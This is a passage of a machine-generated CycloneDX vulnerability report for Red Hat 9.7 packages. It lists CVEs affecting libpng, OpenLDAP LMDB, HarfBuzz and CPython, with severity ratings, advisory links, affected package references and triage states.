"urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/p11-kit-trust@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/p11-kit@0.25.3-3.el9_5?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-22020", "ratings": [ { "source": { "name": "redhat" }, "score": 7.1, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" } ], "description": "No description is available for this CVE.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-22020" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-22020" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22020" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-22020" }, { "url": "https://www.oracle.com/security-alerts/cpuapr2026.html#AppendixJAVA" } ], "affects": [ { "ref": "pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2", "versions": [ { "version": "2:1.6.37-12.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2026-22185", "ratings": [ { "source": { "name": "redhat" }, "score": 6.8, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 125, 191 ], "description": "OpenLDAP Lightning Memory-Mapped Database (LMDB) versions up to and including 0.9.14, prior to commit 8e1fda8, contain a heap buffer underflow in the readline() function of mdb_load. When processing malformed input containing an embedded NUL byte, an unsigned offset calculation can underflow and cause an out-of-bounds read of one byte before the allocated heap buffer. This can cause mdb_load to crash, leading to a limited denial-of-service condition.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-22185" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-22185" }, { "url": "https://bugs.openldap.org/show_bug.cgi?id=10421" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22185" }, { "url": "https://seclists.org/fulldisclosure/2026/Jan/5" }, { "url": "https://seclists.org/fulldisclosure/2026/Jan/8" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-22185" }, { "url": "https://www.openldap.org/" }, { "url": "https://www.vulncheck.com/advisories/openldap-lmdb-mdb-load-heap-buffer-underflow-in-readline" } ], "published": "2026-01-07T21:16:01+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.6.8-4.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-22693", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 476 ], "description": "HarfBuzz is a text shaping engine. Prior to version 12.3.0, a null pointer dereference vulnerability exists in the SubtableUnicodesCache::create function located in src/hb-ot-cmap-table.hh. The function fails to check if hb_malloc returns NULL before using placement new to construct an object at the returned pointer address. When hb_malloc fails to allocate memory (which can occur in low-memory conditions or when using custom allocators that simulate allocation failures), it returns NULL. The code then attempts to call the constructor on this null pointer using placement new syntax, resulting in undefined behavior and a Segmentation Fault. This issue has been patched in version 12.3.0.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-22693" }, { "url": "http://www.openwall.com/lists/oss-security/2026/01/11/1" }, { "url": "http://www.openwall.com/lists/oss-security/2026/01/12/1" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-22693" }, { "url": "https://github.com/harfbuzz/harfbuzz/commit/1265ff8d990284f04d8768f35b0e20ae5f60daae" }, { "url": "https://github.com/harfbuzz/harfbuzz/security/advisories/GHSA-xvjr-f2r9-c7ww" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22693" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-22693" } ], "published": "2026-01-10T06:15:52+00:00", "updated": "2026-02-18T17:49:22+00:00", "affects": [ { "ref": "pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.7.4-10.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-2297", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 3.3, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "source": { "name": "rocky" }, "severity": "high" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 668 ], "description": "The import hook in CPython that handles legacy *.pyc files (SourcelessFileLoader) is incorrectly handled in FileLoader (a base class) and so does not use io.open_code() to read the .pyc files. sys.audit handlers for this audit event therefore do not fire.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-2297" }, { "url": "http://www.openwall.com/lists/oss-security/2026/03/05/6" }, { "url": "https://access.redhat.com/errata/RHSA-2026:10950" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-2297" }, { "url": "https://bugzilla.redhat.com/2395108" }, { "url": "https://bugzilla.redhat.com/2408891" }, { "url": "https://bugzilla.redhat.com/2418084" }, { "url": "https://bugzilla.redhat.com/2431366" }, { "url": "https://bugzilla.redhat.com/2431374" }, { "url": "https://bugzilla.redhat.com/2444691" }, { "url": "https://bugzilla.redhat.com/2448168" }, { "url": "https://bugzilla.redhat.com/2448181" }, { "url": "https://bugzilla.redhat.com/2457409" }, { "url": "https://bugzilla.redhat.com/2457932" }, { "url": "https://bugzilla.redhat.com/2458049" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100" }, { "url": "https://errata.almalinux.org/8/ALSA-2026-10950.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:10950" }, { "url": "https://github.com/python/cpython/commit/482d6f8bdba9da3725d272e8bb4a2d25fb6a603e" }, { "url": "https://github.com/python/cpython/commit/69ddd9bb2cc4bd69b1565647c18659c6a789ccd9" }, { "url": "https://github.com/python/cpython/commit/876858c9f65d9ab656c7fa639f268ce7856d89dd" }, { "url": "https://github.com/python/cpython/commit/a51b1b512de1d56b3714b65628a2eae2b07e535e" }, { "url": "https://github.com/python/cpython/commit/e58e9802b9bec5cdbf48fc9bf1da5f4fda482e86" }, { "url": "https://github.com/python/cpython/issues/145506" }, { "url": "https://github.com/python/cpython/pull/145507" }, { "url": "https://linux.oracle.com/cve/CVE-2026-2297.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-10950.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2297" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-2297" } ], "published": "2026-03-04T23:16:10+00:00", "updated": "2026-05-01T16:16:30+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { 